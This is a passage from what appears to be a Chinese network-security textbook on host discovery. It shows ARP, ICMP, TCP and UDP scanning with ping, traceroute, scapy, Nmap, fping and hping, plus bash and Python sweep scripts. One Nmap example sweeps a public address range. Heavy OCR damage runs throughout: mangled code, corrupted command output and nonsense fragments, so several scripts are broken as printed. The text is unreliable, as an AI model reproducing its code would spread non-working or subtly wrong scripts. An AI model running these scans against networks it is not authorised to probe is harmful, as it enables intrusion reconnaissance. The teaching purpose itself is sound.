的 脚本 ， 该 脚本 可 以 读 取 指定 文件 ， 并 扫 
描 文件 中 给 定 的 人 P 地 址 ， 具 体 代码 如 下 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if len(sys.argv) !=2: 
print"Usage 
[interface]" 
print"Example 
ESESESEY 
print "Example will perform an ARP 
scan of the local subnet to which eth0 
is assigned" 
sys.exit() 


/arp disc.py 


/arp dlsea py 


filename = str(sys.argv[1])  # 定 义 一 个 
变量 读 取 文 件 名 
file = open (filename, 'r') ## 以 读 的 形式 打 


开 该 文件 
for addr in file: # 每 次 从 文件 中 读 取 一 行 


answer = srl(ARP (pdst=addr. 
strip()) ,timeout=0.1,verbose=0)# 以 文件 中 
的 IP 地 址 发 送 
if answer == None: 
pass 
else: 


# 将 有 返回 的 IP 进 


print addqr.strip() 
行 显示 
10.3 三 层 扫 描 


三 层 扫描 的 优点 是 速度 比较 快 ， 缺 点 
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是 可 能 会 被 边界 防火 墙 过 滤 掉 。 三 层 扫 描 
主要 是 通过 IP、ICMP 协 议 来 进行 扫描 ， 理 
论 上 通过 三 层 扫描 可 以 发 现任 何 一 台 在 线 
的 主机 ， 当 然 前 提 是 它 接收 并 返回 相应 的 
IP、ICMP 数 据 包 。 


10.3.1 使 用 Ping 命 令 


Ping 指 的 是 端 对 端 连通 ， 通 常用 来 作 
为 可 用 性 的 检查 ， 但 是 某 些 病毒 木马 会 强 
行 大 量 远程 执行 Ping 命 令 来 抢占 用 户 的 网 
络 资源 ， 导 致 系统 变 慢 ， 网 速 变 慢 。 因 此 
大 多 数 防火 墙 的 一 个 基本 功能 便 是 过 滤 
Ping 数 据 包 。 

IP 协 议 是 将 多 个 包 交 换 网 络 连 接 起 

来 ， 它 在 源 地 址 和 目的 地 址 之 间 传 送 一 种 
称 之 为 数据 包 的 东西 ， 它 还 提供 对 数据 大 
小 的 重新 组 装 功能 ， 以 适应 不 同 网 络 对 数 
据 包 大 小 的 要 求 。 
侈 注意 : IP 不 提供 可 靠 的 传输 服务 ， 它 不 
提供 端 到 端的 或 〈 路 由 ) 节点 到 (路 由 ) 
节点 的 确认 ， 对 数据 没有 差错 控制 ， 它 只 
使 用 报头 的 校 验 码 ， 它 不 提供 重 发 和 流量 
控制 。 如 果 出 错 可 以 通过 ICMP 报 告 ，ICMP 
在 IP 模 块 中 实现 。 


ICMP 是 (Internet Control Message Pro- 
tocol) Internet 控 制 报 文 协议 。 它 是 TCP/IP 
协议 族 中 的 子 协议 ， 用 于 在 主机 、 路 由 器 
之 间 传 递 控制 消息 。 控 制 消息 是 指 网 络 通 
不 通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 
络 本 身 的 消息 。 这 些 控制 消息 虽然 并 不 传 
输 用 户 数 据 ， 但 是 对 于 用 户 数据 的 传递 起 
着 重要 的 作用 。 

下 面 介 绍 Ping 命 令 的 使 用 ， 具 体操 作 步 
又 如 下 : 

[step 图 在 Kali Linux 系 统 界 面 中 ， 执 行 Ping 
-命令 可 以 查看 Ping 命 令 的 帮助 信息 ， 执 行 
效果 如 下 图 所 示 。 
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rootBKa ng 

age ping ieaAgaaorntnoqrabvwveal [IT interface 
上 ar UM ptudt se ention] EUpretoogl bp 全 te 1°0 tosl 

TU] [-T tinestamp option] 


IN nodeinfo_option] [-p pattern] [-0 tclass] [-s packetsize] 
TS sndbuf T tinestamp_option] [-w deadline] 
[-w tiweout] destination 


[step 图 如 果 需 要 执行 发 送 的 数据 包 数 量 ， 
这 时 可 以 执行 Ping 192.168.1.1 -c 3 命令 。 其 
中 ，-c 参 数 的 作用 是 指定 发 送 几 个 数据 包 ， 
执行 效果 如 下 图 所 示 。 


rootekati:-# ping 192.168.1.1 -c 3 

PING 192.168.1.1 (19: ) 56(84) bytes of data. 

64 bytes from 192.168 mp_seq=1 ttl=64 time=0.940 ms 
64 bytes from 192.168 mp seq=2 ttl=64 time=1.01 ms 
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=1.22 ms 


-- 192.168.1.1 ping statistics --- 
3 packets transmitted, 3 received，6% packet loss, time 6ms 
rtt min/avg/max/mdev = 9.949/1.955/1.216/6.129 ms 


通过 Wireshark 工 具 可 以 抓 取 数 据 包 ， 
其 中 包含 源 地 址 与 目的 地 址 ， 以 及 ICMP 协 
议 中 的 Type 字段 ， 该 字段 为 8 个 ， 执 行 效果 
如 下 图 所 示 。 


TImEErWEEC PrarOEOIVETSIOT 4, ST T9716871 TT, USt 92-T69-TT 
~ Internet Control Message Prorocol 
Type: 8 (Echo (ping) request) 
日 


Checksum: gxaade [correct] 
[checksum Status: Good] 
Identifier (BE): 4491 (9x1131) 
Identifier (LE):; 12561 (Bx3111) 
Sequence number (BE): 1 (6Bx9661) 
Sequence number (LE): 256 (9xB190) 
TResponse frame: 6] 
Timestamp from icmp data: Oct 24, 2018 23:47:35.000009666 EDT 
[Timestamp from icmp data (relative): 0.885739416 seconds] 
» Data (48 bytes) 


查看 返回 数据 包 中 的 ICMP 协 议 ， 该 
数据 包 中 的 ICMP 协 议 Type 字 段位 为 0， 执 
行 效果 如 下 图 所 示 。 


TImrErWeT PrOrOCOI VerSION 4 STET T92-T68-TTT USET T92168- 1-TOT 
~ Internet Control Message Protocol 

Type: 9 (Echo (ping) reply) 

code: © 

Checksum: exacde [correct] 

[checksum Status: Good] 

Identifier (BE): 4401 (gx1131) 

Identifier (LE): 12561 (9x3111) 

Sequence number {BE): 1 (9x9001) 

Sequence number (LE): 256 (9x9166) 

[Request frame: 5] 

[Response time: 1.376 ms] 

Timestanp from icnp data: Oct 24，2918 23147:35.999999966 EDT 

[Timestamp from icnp data (relative): 9.887115143 seconds] 

， Data (46 bytes) 


[Step 图 查看 到 达 目 标 地 址 经 过 多 少 跳 路 由 
器 ， 使 用 traceroute 命 令 可 以 查看 到 达 目 标 
地 址 经 过 多 少 跳 路 由 器 ， 执 行 效果 如 下 图 
所 示 。 图 中 给 出 了 部 分 路 由 节点 ， 可 以 看 
到 当前 路 由 器 设置 了 ICMP 数 据 包 过 滤 。 


Tare wba, 
ww -bai (220 181 111.188) ，36 hops 


ax, 60 byte packets 


em 
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traceroute (Windows 系 统 下 是 tracert) 命令 利用 ICMP 协 议定 位 用 户 的 计算 机 和 目标 
计算 机 之 间 的 所 有 路 由 器 ， 它 是 侦 测 主机 到 目的 主机 之 间 所 经 路 由 情况 的 重要 工具 ， 也 
是 最 便利 的 工具 。 使 用 traceroute 命 令 侦 测 主机 的 详细 过 程 如 下 : 

(1) 将 传递 到 目的 人 P 地 址 的 ICMP Echo 消息 的 TTL 值 被 设置 为 1， 该 数据 报 经 过 第 
一 个 路 由 器 时 ， 其 TTL 值 减 去 1， 此 时 新 产生 的 TTL 值 为 0。 

(2) 由 于 TTL 值 被 设置 为 0， 路 由 器 判断 此 时 不 应 该 尝试 继续 转发 数据 报 ， 而 是 直 
接 抛弃 该 数据 报 。 由 于 数据 报 的 生存 周期 (TTL 值 ) 已 经 到 期 ， 这 个 路 由 器 会 发 送 一 个 
ICMP 时 间 超 时 ， 即 TTL 值 过 期 信息 返回 到 客户 端 计算 机 。 

(3) 此 时 ， 发 出 traceroute 命 令 的 客户 端 计 算 机 将 显示 该 路 由 器 的 名 称 ， 之 后 可 以 
再 发 送 一 个 ICMP Echo 消息 并 把 TTL 值 设置 为 2。 

(4) 第 1 个 路 由 器 仍然 对 这 个 TTL 值 减 1。 如 果 可 能 ， 将 这 个 数据 报 转发 到 传输 路 径 
上 的 下 一 跳 。 当 数据 报 抵达 第 2 个 路 由 器 ，TTL 值 会 再 被 减 去 1， 成 为 0。 

(5) 第 2 个 路 由 器 会 像 第 1 个 路 由 器 一 样 ， 抛 弃 这 个 数据 包 ， 并 像 第 1 个 路 由 器 那样 


返回 一 个 ICMP 消 息 。 


(6) 该 过 程 会 一 直 持 续 ，traceroute 命 令 会 不 停 地 递增 TTL 值 ， 而 传输 路 径 上 的 路 
由 器 不 断 递减 该 值 ， 直 到 数据 报 最 终 抵达 预期 的 目的 地 。 
(7) 当 目 的 计算 机 接收 到 ICMP Echo 消 息 时 ， 会 回 传 一 个 ICMP Echo Reply 消 息 。 


过 滤 网 络 中 存活 主机 的 IP 地 址 ， 使 用 
Ping 192.168.1.1 -c 5 | grep "bytes from" | cut 
-d""-f4|cut-d":" -fl 命令， 可 以 将 网 络 中 
存活 主机 的 IP 地 址 过 滤 出 来 ， 执 行 效果 如 下 
图 所 示 。 


Iroot@kali:-~# ping 192.168.1.1 -c 5 | grep “bytes from’ 
| cut -d""-f4|cut-d":" -fl 


192.168.1.1 
192.168.1.1 


192.168.1.1 
192.168.1.1 


1192.168.1.1 
通过 上 面 过 滤 的 特性 可 以 编写 一 个 自 
动 化 Ping 的 shell 肢 本。 具体 代 码 如 下 : 
#!/bin/bash 
if [ “$#" =ne 1 lthen 
echo"Usage-./Pingl.sh [interface]" 
echo"Excample-./Pingl.sh 192.168.1" 
echo"Example will perform an ICMP 
scan of the 192.168.1.0/24 range " 
exit 
ff 
prefix=$1 
for addr in $(seq 1 200);do # 循 环 发 送 
Ping 命 令 到 地 址 段 


Ping =e 1 Sprefixs$addr | ‘grep 


"bytes from® | cub =d: ™ ™ =£.# eut’ =d 
mem ff 1 ")" -fl 
done 


当然 也 可 以 编写 一 个 通过 读 取 文件 来 
进行 扫描 的 shell 肢 本。 具体 代 码 如 下 : 


#!/bin/bash 
1E [ “S$#" -ne 1 Jrthen 
echo"Usage-./Ping2.sh [interface]" 
echo"Excample-./Ping2.sh file" 
echo" Example will perform an ICMP 
scan of the file in range " 
exit 
五 
file=$1  # 定 义 一 个 变量 将 参数 赋值 给 变量 
for addr in $(cat $file);do  # 读 取 文 件 
中 的 内 容 ， 每 循环 一 次 读 取 一 行 
Ping -c 1 $addr | grep "bytes from" 
ER 
done 


10.3.2 ”使 用 工具 扫描 
在 三 层 扫描 中 ， 可 以 使 用 scapy、 
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Namp、fping、hping 等 工具 来 扫描 当前 网 络 
存活 的 主机 。 


1. scapy 工 具 


使 用 scapy 工 具 的 操作 步骤 如 下 : 
[step 图 使 用 scapy 工 具 构 建 Ping 包 ， 定 义 
变量 i 并 赋值 为 IP()， 定 义 变 量 p 并 赋值 为 
ICMPO， 再 定义 Ping 变 量 ， 将 IP 包 与 ICMP 
包 组 合 赋值 给 Ping， 执 行 效果 如 下 图 所 示 。 


p>> ping=(1/p} 
> ping.display() 
gl 3p on# wae Tem ese 


echo-request 


id= 1 
flags= 
frag™ 9 


由 
Noptions\ 


发 送 Ping 包 检查 返回 数据 信息 ， 给 IP 
包 赋 值 为 目标 地 址 ， 使 用 srl() 方 法 发 送 数 据 

并 查看 返回 数据 包 的 信息 ， 执 行 效果 
如 下 图 所 示 。 


>> ping[TP] dst = 
>>> a = srl(ping) 
Begin emission: 

.Finished sending 1 packets 


"192 168 1.1" 


Received 2 packets, got 1 answers, renaining 6 packets 
> a.display() 
us IP 


en[ IchP Ia#¢ 


x60\x60\x6g\x69\xe0\xg6 
x@0\xee 


step 国 使 用 命令 构建 Ping 包 ， 该 命令 为 : 
srl(IP(dst="192.168.1.1")/ICMP()). 
display0， 执行 效果 如 下 图 所 示 。 


1581- 17 


lons\ 


>> SrllIP(ds 
Beyin enissio 
.Finished sending 1 packets. 


7ICHP(O) .display() 


Recelved 2 packets, got 1 answers, renaining 9 packets 
HT ] 办 #1 ICHP | Hh# 


version= 4 


Seq= 9xg 
#4#[ Padding ]### 


load= ，\VxgeNxggVx99Nxg9NxggN 
xgg\xb9\x09\x6g\x66\x96Vx6B\X99\x69 


xge\xggNxgg\xgey 


通过 上 面 的 命令 ， 可 以 编写 一 个 自动 
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化 python 脚 本 ， 来 构建 Ping 数 据 表 ， 具 体 代 
码 如 下 : 

#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import 六 

if len(sys.argv) !=2: 

Bent 
[interface]™" 
print"Example 

L923 I60 OO 

print "Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 

Sys.exit() 

address = strl(sys.argv[1] 
将 参数 赋值 给 变量 
# 拆 分 出 IP 地 址 
Beeflr sm “addressasp idl( ee 
| 她! 司 攻 汶 二 六 入 和 共和 
is ddreas sp Ale 

for addr in range(1,254) : 

ip=prefix+str (addr) # 组 装 IP 地 址 

# 构 建 Ping 包 并 发 送 ， 设置 超时 时 间 0.1ms， 不 
显示 错误 信息 


answer = 


/Ping py 


ng py 


# 定 义 一 个 
变量 ， 


) 
) 


srl(IP(dst=prefix+ 
str(addr))/ICMP(),timeout=0.1,verbose=0) 


if answer == None: 
pass 
else: 
print prefixt+str (addr) # 将 存活 主 
机 IP 地 址 打印 出 来 


当然 也 可 以 将 IP 地 址 存放 在 一 个 文件 
中 ， 通 过 python 肢 本 读 取 文件 中 的 人 P 地 址 进 
行 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2: 
print"Usage . 
[interface]" 
print”Example «< 
L192.168>1.0" 
print "Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
sys.exit() 
filename = str(sys.argv[1])# 定 义 一 个 变 
量 ,将 参数 中 的 文件 名 赋值 给 变量 


PLINGL. BY 


= Pngl- py 


file = open (flename ,'r') 压 定 义 一 个 
变量 ,使 用 open 方 法 以 读 的 方式 打开 文件 
for addr in file: 
每 次 读 取 一 行 IP 地 址 
answer = srl(IP(dst=addr.strip())/ 
ICMP(),timeout=0.1,verbose=0) 
if answer == None: 
pass 
else: 
print addr.strip() 


机 IP 地 址 打印 出 来 


担 从 文件 中 


# 将 存活 主 


2. Nmap 工 具 


在 二 层 扫 描 时 ， 可 以 使 用 Nmap 工 具 进 
行 扫 描 ， 在 三 层 扫 描 中 也 可 以 使 用 Nmap 工 
具 ， 但 是 地 址 却 不 同 ， 二 层 只 能 在 本 机 网 
段 进行 扫描 ， 三 层 可 以 使 用 任何 网 段 。 

使 用 Nmap 工 具 进 行 三 层 扫 描 的 具体 
方法 为 : 使 用 Nmap 220.181.111.0/24 
令 ， 换 用 不 同 地 址 段 的 卫 进 行 扫描 ， 它 会 发 
送 ICMP 数 据 包 ， 执行 效果 如 下 图 所 示 。 


rootakali: 
Istarting Nmap 7.70 ( https://nmap.org ) at 2918-16-25 04:31 EDT 
Nnap scan report for 220.181.111.1 

Host is up (8.963s latency). 

INnap scan report for 229.181.111.21 

Host is up (8.949s latency). 

INnap scan report for 220.181.111.22 

Host is up (6.972s latency). 


Test/3# nnap 229.181 111.0/24 -sn 


3. fping 工 具 


fping 工 具 同 Ping 工 具 类 似 ， 但 是 它 不 
是 系统 自 带 的 ， 它 比 Ping 工 具 返 回 的 信息 量 
更 大 。 其 中 常用 参数 介绍 如 下 : 
e -g: IP 区 间 表 示 需 要 增加 -g 参 数 ， 
可 以 用 fping -g 192.168.1.0/24 这 
样 的 形式 展示 也 可 以 用 fping -g 
192.168.1.1 192.168.1.254 这 样 区 间 
展现 的 形式 。 
。 -q: 安静 模式 ， 所 谓 安静 就 是 中 途 
不 输出 错误 信息 ， 直 接 在 结果 中 显 
示 ， 输 出 结构 整齐 、 高 效 。 
e -C: 输入 每 个 了 探测 的 次 数 。 
e -i: 通过 -i 参数 可 以 修改 发 包间 隔 ， 
默认 为 25ms 一 个 探测 报 文 。 
使 用 fping 工 具 进 行 三 层 扫描 的 操作 步 
又 如 下 : 
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step 国 发 送 数据 包 ， 使 用 fping 192.168.1.1 -c 
3 命令 发 送 3 个 数据 包 ， 进 行 信息 探测 ， 执 
行 效果 如 下 图 所 示 。 


Foovekali /Test/3g Tping 192.168.1.1 -ce 3 

hez.168.1.1 : [0], 84 bytes，1.61 ms (1.91 avg, 0% loss) 
92.168.1.1 : [1], 84 bytes, 1.24 ms (1.12 avg, 6% loss) 
he2.168.1.1 : [2], 84 bytes, 1.26 ms (1.15 avg, 0% loss) 

192.168 .1.1 : xmt/rcv/sloss = 3/3/6%, min/avg/max = 1.61/1.15/1.24 


[step 图 扫描 一 个 网 段 ， 使 用 fping -g 
192.168.1.1 192.168.1.200 -c 1 命令 ， 可 以 扫 
描 两 个 了 地址 之 间 的 一 个 网 段 ， 执 行 效果 如 
下 图 所 示 。 


FeatgRaUE-TTeSE73 Thing -9 192.168,1.1 192.,168,1.200 -¢ 1 

hez.168.1.1 : [0], 84 vg, Bs loss) 

Fwp Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1.3 

kenp Host unreachable {ron 192.168.1.181 for IcMp Echo sent to 192.168.1.2 

PhP Host Unreachable from 192-168-1 191 for TCMP sent to 192.166-1.6 
5 
4 


cMP Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1, 


192.168,1.1 。 : xmt/rcv/Wlos5 = 1/1/0%, min/ovg/mox = 1.16/1.15/1.16 
li92.168.1.2  : xnt/rev/sloss = 1/0/108% 
li92.168-1.3 : xnt/rev/sloss = 1/0/198% 
192.168.1.4 : xmt/rcv/%loss = 1/0/196% 


[step 图 使 用 fping -g 192.168.1.1 
192.168.1.200 -c 1 >> a.txt 命 令 ， 将 存活 的 主 
机 字段 保存 到 一 个 文件 中 ， 并 通过 cat a.txt 
文本 显示 出 存活 主机 信息 ， 执 行 效果 如 下 
图 所 示 。 

root@kali:~/Test/3# cat a.txt 
192.168.1.1 : [9], 84 bytes, 


192.168.1.101 : [9], 84 bytes, 
192.168.1.162 : [9], 84 bytes, 


fping 工 具 支 持 使 用 掩 码 的 形式 赋 
值 地 址 段 ， 使 用 fping -g 192.168.1.0/24 
-c 1 命令 ， 扫 描 地 址 段 ， 执 行 效果 如 下 图 


1.23 ms (1.23 avg, O% loss) 
0.68 ms (0.08 avg, 0% loss) 
136 ms (139 avg, 9% loss) 


所 示 。 

FOR HE 
he92.168.1.1 : [9], 84 bytes，1.98 ms (1.68 avg，6s% 1055) 
h9z.168.1.191 : [9]，84 bytes, 9.92 ms (9.62 avg, 0% 1055)] 


192.168.1.102 : [9], 84 bytes, 141 ms (141 avg, 6% loss) 
ICMP Host Unreachable fron 192.168.1.101 for ICMP Echo sent to 192.168.1.3 
CMP Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1.2 


[step 图 fping 工 具 支持 从 文件 中 读 取 IP 地 址 
进行 扫描 ， 使 用 fping -f addr 命 令 ， 扫 描 
文件 中 给 出 IP 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


FoovekalL -Test ss Thing -7 addr 
192.168.1.1 1s alive 

haz 168-1 161 
Tomp Host unreachabte from 192.168.1.101 for ICMP Echo sent to 192,168.1.2 
CMP Host unreachabte from 192.168.1.191 for ICMP Echo sent to 192,168.1.2 
ICMP Host Unreachable from 192.168.1.101 for ICMP Echo sent to 192.168.1.2 
Hamp Host unreachable fron 192.168.1.191 for ICMP Echo sent to 192.168.1.2 
192.168.1.2 is unreachabte 

192.168.1.160 is unreachable 


is alive 


4. hping 工 具 


hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数 
据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Linux 
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下 的 Ping 命 令 ， 但 是 它 不 是 只 能 发 送 ICMP 
回应 请 求 ， 它 还 支持 TCP、UDP、ICMP 和 
RAW-IP 协 议 。 

另外 ，hping 有 一 个 路 由 跟踪 模式 ， 能 

够 在 两 个 相互 包含 的 通道 之 间 传 送 文件 。 
因此 ， 常 被 用 于 检测 网 络 和 主机 ， 其 功能 
非常 强大 ， 可 在 多 种 操作 系统 下 运行 ， 如 
Linux、FreeBSD、NetBSD、OpenBSD、 
Solaris、MacOs X、Windows 等 。 

该 工具 的 主要 参数 介绍 如 下 : 

e -H (-HELP) : 显示 帮助 。 

e -v (-VERSION) : 版 本 信息 。 

e@ -c (--count count) : 发 送 数据 包 的 
次 数 。 关 于 countreached timeout 可 
以 在 hping2.h 里 编辑 。 

e -i(-interval) : 包 发 送 间隔 时 间 
(单位 是 ms) ， 默 认 时 间 是 1s。 此 
功能 在 增加 传输 率 上 很 重要 ， 在 idle/ 
spoofing 扫 描 时 此 功能 也 会 被 用 到 。 

e -n (-nmeric) : 数字 输出 。 象 征 性 
输出 主机 地 址 〈 用 处 不 大 ) 。 

e -q (-quiet) : 退出 。 什 么 都 不 会 输 
出 ， 除 了 开始 结束 时 间 。 

® -i (--interface interface name) : 无 
非 就 是 eth0 之 类 的 参数 。 

e -Vv (-verbose) : 显示 很 多 信息 ， 
TCP 回 应 一 般 如 下 : len=46: 
ip=192.168.1.1; flags=RADF: seq=0; 
ttl=255; 1d=0; win=0; rtt=0.4ms: tos=0; 
1iplen=40; seq=0; ack=1380893504; 
sum=2010; urp=0。 

e -d (-debug) : 进入 debug 模 式 ， 当 
遇 到 麻烦 时 ， 比 如 用 hping 遇 到 一 些 
不 合 习惯 的 模式 时 ， 你 可 以 用 以 下 
模式 修改 hping， (interface detection, 
data link layer access, interface 


settings, ...)。 
e -z (-BIND) : 快捷 键 的 使 用 (可 
按 个 人 喜好 设 定 ) 。 
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e -Z (-unbind) : 消除 快捷 键 。 

该 工具 的 主要 功能 如 下 : 

(1) 防火 墙 测 试 。 

(2) 实用 的 端口 扫描 。 

(3) 网 络 检测 ， 可 以 用 不 同 的 协议 、 
服务 类 型 (TOS) 、 卫 分 片 。 

(4) 手工 探测 MTU (最 大 传输 单元 ) 
路 径 。 

(5) 先进 的 路 由 跟踪 ,支持 所 有 的 

(6) 远程 操作 系统 探测 。 

(7) 远程 的 运行 时 间 探 测 。 

(8) TCP/IP 堆栈 审计 。 

使 用 hping 工 具 进 行 三 层 扫描 的 方法 
为 : 使 用 hping3 192.168.1.1 --icmp -c 2 命 
令 ， 可 以 对 目标 IP 进 行 探测 ， 并 给 出 相应 的 
信息 ， 执 行 效果 如 下 图 所 示 。 


SS pin 


headers + 9 data bytes 
ns 


192.168.1.1 
2 pack 


round 


另外 ， 用 户 可 以 使 用 for addr in $(seq 
1 254):do hping3 192.168.1.$addr --icmp -c 1 
>> handle.txt &done 命 令 ， 对 一 个 IP 段 的 地 
址 进行 扫描 并 将 结果 保存 到 一 个 文件 中 。 
这 是 因为 该 工具 显示 出 来 的 东西 比较 多 比 
较 杂 ， 所 以 建议 保存 到 一 个 文件 当中 再 进 
行 查看 。 


钨 提示: 使 用 cat handle txt | grep len | cut -d 
ww 了 f2 | cut -d "=" -f 2 命令 ， 可 以 将 文本 中 
存活 主机 的 JP 信息 提取 出 来 。 


10.4 四 层 扫描 


四 层 扫描 的 优点 是 结果 可 靠 ， 而 且 
不 会 被 防火 墙 过 滤 ， 甚 至 可 以 发 现 所 有 端 
口 都 被 过 滤 的 主机 ， 缺 点 是 基于 状态 过 滤 
的 防火 墙 可 能 过 滤 扫 描 ， 且 全 端口 扫描 速 


度 慢 。 四 层 扫 描 是 基于 TCP、UDP 协 议 来 进 
行 的 。 


10.4.1 TCP 扫 描 


TCP (Transmission Control Protocol， 
传输 控制 协议 ) 是 一 种 面向 连接 的 、 可 靠 
的 、 基 于 字 节 流 的 传输 层 通信 协议 ， 由 
IETF 的 RFC 793 定 义 ， 在 简化 的 无 线 网 络 
OSI 模型 中 ， 它 完成 第 四 层 传输 层 所 指定 的 
功能 。 

在 因特网 协议 族 (Internet protocol 
suite) 中 ，TCP 层 是 位 于 IP 层 之 上 ， 应 用 层 
之 下 的 中 间 层 。 不 同 主机 的 应 用 层 之 间 经 
常 需要 可 靠 的 、 像 管道 一 样 的 连接 ， 但 是 了 
层 不 提供 这 样 的 流 机 制 ， 而 是 提供 不 可 靠 
的 包 交 换 。 

TCP 通 信 需 要 建立 3 次 握手 ，TCP 的 3 次 
握手 示意 图 如 下 。 


建立 TC 
散 动 打开 


建立 
4 


TCP 探 测 主机 的 原理 有 如 下 两 条 。 

(1) 未 经 请 求 直接 发 送 ACK 数据 包 ， 
通常 情况 下 主机 会 回复 RST 数据 包 。 

(2) 正常 请 求 发 送 SYN 请 求 数据 包 ， 
如 果 端 口 开 放 会 回复 SYN/ACK 数据 包 ， 如 
果 端 口 没 有 开放 回复 RST 数据 包 。 

使 用 scapy 工 具 进行 TCP 扫 描 的 操作 步 
又 如 下 : 
[sep 贺 通过 scapy 构 建 TCP 数 据 包 ， 使 用 
i=IP():; i.dst="192.168.1.1"; i.dispaly() 命 令 ， 
执行 效果 如 下 图 所 示 ， 可 以 看 到 修改 了 卫 字 
段 的 目的 耳 地址 。 
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step 轩 通过 t=TCP(); tflags='A' t.display() 
每 尖 ， 可 以 修改 TCP 数 据 包 的 发 送 类 型 为 
ACK 孝 据 包 ， 执 行 效果 如 下 图 所 示 。 


> t=TCP() 

>> tfLags='A' 
>>> t.display() 
###[ TCP ]### 

sport= ftp data 

dport= http 

seq= 9 

ack= 9 

dataofs= None 


reserved= 9 
flags= A 
window= 8192 
chksum= None 
urgptr= 9 
options= [] 


使 用 [=(i/0).display0 命 令 ， 可 以 将 全 包 
与 TCP 包 组 合 ， 并 查看 数据 包 结 构 ， 执 行 效 
果 如 下 图 所 示 。 


Fr=G7TT qispUayU) 
WH##[ IP ]### 


HH#[ TCP ] #4# 
sport= ftp_data 
dport= http 


urcptr= 9 
options= 1 


使 用 命令 a=sr1(r).dispaly 〇 命令 ， 将 数 
据 包 发 送出 去 ， 查 看 返回 数据 包 内 容 ， 执 
行 效 果 如 下 图 所 示 。 


lBegin enissis 
:Finished sending 1 packets. 


lneceived 2 packets, got 1 answers, renaining © packets 
asl IP Joan 04[ TCP J4F# 


a 
= ' \x00\ x0O\ X00\xO0\ x00\ xg0 
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人 移 注 意 : 使 用 “; ”符号 结束 语句 。 该 语 
各 为 一 条 单独 语句 ， 为 了 便于 区 分 特别 加 入 
了 分 号 《在 代码 中 是 没有 分 号 的 ) 。 


step 图 使 用 一 条 命令 可 以 完成 TCP 扫 描 ， 
该 命令 为 a1=sr1(IP(dst="192.168.1.1")/ 
TCP(dport=80,flags='A'),timeout=0.1). 
display()， 执 行 效果 如 下 图 所 示 。 


SIUEPUOS TT TO0 TTT TEPVOPOT EBS THK TCE TL CEy) 


ta 


‘eceived 1 packets, 
[ IP ww 


got 1 ansvers，remaining 9 packets 
eol Tl 


下 面 编辑 一 yn 来 实现 四 层 
TCP 自 动 扫 描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2: 
print"Usage . ./TCP_SCAN.py 
network address]" 
print"Example 
Ee 
print "Example will perform a TCP 
ACK Ping scan of the 192.168.1.0/24 
range™" 
sys.exit() 
address = str(sys.argv[1]) 
# 定 义 一 个 变量 ,将 参数 赋值 给 地 址 变量 
# 使 用 分 割 函 数 分 割 出 IP 地 址 的 前 三 段 


[/24 


./TCP_SCRAN.pY 


rE = addressespirit ta 
Ee 
EE] addressesplit(ee "hit 
For "addr dn roange (lr 2 
# 使 用 for 循 环 遍 历 整 个 网 段 
# 构 造 发 送 TCP 数 据 包 
response = srl(IP(dst=prefix+str 


(addr) ) /TCP (dport=80, flags="'A'),timeout= 
0.1,verbose=0) 
try:  # 异 常 处 理 


if int(response[TCP] .fags 
# 如 果 返 回 的 数据 包 是 Reset 的 数据 包 ， 认为 存活 
print prefix+str (addr) 
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## 将 存活 主机 打印 输出 
except: 
pass 


10.4.2 UDP 扫描 


UDP (User Datagram Protocol， 用 户 数 
据 报 协议 ) 是 OSI (Open System Intercon- 
nection， 开 放 式 系统 互联 ) 参考 模型 中 一 
种 无 连接 的 传输 层 协议 ， 提 供 面 向 事务 的 
简单 不 可 靠 信息 传送 服务 。 

UDP 探测 主机 的 原理 为 : 当 客 户 端 向 
目标 主机 发 送 一 个 UDP 请 求 时 ， 如 果 目 标 
主机 开放 了 此 端口 ， 不 会 做 出 任何 响应 ， 
如 果 该 主机 没有 开放 此 端口 ， 会 回复 一 个 
端口 不 可 达 信 息 。 

使 用 scapy 工 具 进 行 UDP 扫 描 的 操作 步 
又 如 下 : 
查看 UDP 数据 包 
UDP(); u.display() 命 令 ， 
所 示 。 


结构 ， 使 用 u= 
执行 效果 如 下 图 


p>> i=IP() 

>>> U=UDP() 

u.display() 

并 ###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 


查看 完整 UDP 数 据 包 结 构 ， 使 用 r=(i/ 
.display0 〇 0 命令， 执行 效果 如 下 图 所 示 。 


FE= r=(170) -dLspUay(y 

庆 ###[ IP ]#### ###[ UDP ]### 
version= 4 sport= domain 
ihl= dport= domain 
tos: Xe len= None 
len= None chksum= None 


>>> 


Estee 图 使 用 r[IP].dst="192.168.1.1" 命 令 修 改 
目标 JP 地 址 ， 使 用 r[UDP].dport=6666 命 令 
修改 目标 端口 ， 使 用 rdisplay() 命 令 查看 修 
改 后 的 数据 包 ， 执 行 效果 如 下 图 所 示 。 


FS rIIPJ-UST="T9Z-T68-TT | 
上 >> r[UDP] .dport=6666 
b>> r.display() 

[ IP ]#4# ###[ UDP 
spo 


[step 园 使 用 srl(r,timeout=1).display() 命 令 发 
送 数 据 包 并 查看 返回 结果 ， 执 行 效果 如 下 
图 所 示 。 


这 5rIUTvEImeouftsIJ -diIspUayTJ 
egin emission 
| Finished sending 1 packets. 


上 2 packets, got 1 answers, remaining 0 packets 

Hs#[ IP ]#4# HH#¥[ IP in ICMNP ]### 
version= 4 version= 4 

ihl= 


ttl= 128 

proto~ icmp 
chksum= 9xb697 
src= 192.168.1.103 
dst= 192.166.1.101 
Noptipns\ 

Jp ICHP ] ww 


proto- udp 


168.1.161 


4 UDP 成 J uu 
sport= donain 
